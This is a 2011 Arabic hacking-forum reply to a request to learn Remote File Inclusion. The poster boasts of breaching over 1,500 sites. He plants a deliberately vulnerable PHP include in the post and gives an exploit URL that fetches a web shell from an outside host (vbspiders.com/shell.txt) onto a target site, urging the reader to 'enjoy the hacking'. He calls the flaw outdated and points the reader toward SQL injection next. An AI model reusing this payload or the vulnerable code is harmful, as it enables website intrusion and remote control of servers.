الموضوع: [استفسار] أريد تعلم اكتشاف تغرة Remote File include
عرض مشاركة واحدة
قديم 08-26-2011, 07:13 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
ZrIqE ViRuS
 
الصورة الرمزية ZrIqE ViRuS
 

 
 
إحصائية العضو





ZrIqE ViRuS غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ZrIqE ViRuS is on a distinguished road
افتراضي رد: أريد تعلم اكتشاف تغرة Remote File include

شوف يا غالي تدور ع دوار الراس تطلب شرح هالثغره

بتعرف صدقني بجوز اخترقت اكثر من 1500 موقع
ولا واحد منهم بهاي الثغره .........!!!

هذا والله ورسوله شاهد على ما اقول

هذه الثغره فيك تسميها ثغره فقط في حال تغير تاريخ السنه وصار 2006

انا مش قصدي احبطك بس الان هاي الثغره صارت من الماضي ليش لانه كل السيرفرات مرقعه منها

فيك فقط تطبقها ع السيرفر الشخصي بتحمله بتخلي اصدار php تاع السيرفر الشخصي 4
وبتزرعها بهاد الكود البسيط داخل ملف php

<?php
include($volcano);
?>

والاستغلال للثغره اعلاه
filename.php?volcano=http://vbspiders.com/shell.txt?

وهون راح انت تسحب شل ع الموقع وتتمتع بالاختراق
لكن حقيقه ما عادت هاي الثغره تعمل نهائيا

فلا تتعب نفسك بها ولو بدك تتعلم هكر
بلش من دوره sql injection

موفق

التوقيع

[CENTER]

كود PHP:
the bad Game
sometimes i help my friend and raise him to the sky
in cloudy day everything has been changed by different way
the most bad thing ever for me is arrogance
insolently he was arrogant to me
he want me trampling his face
and everyone ask him why there is footsteps on your face
my silence means just to give him more chance to correct his problem 

المستخدم غائب حتى
6-9-2011
دعواتكم

 

   

رد مع اقتباس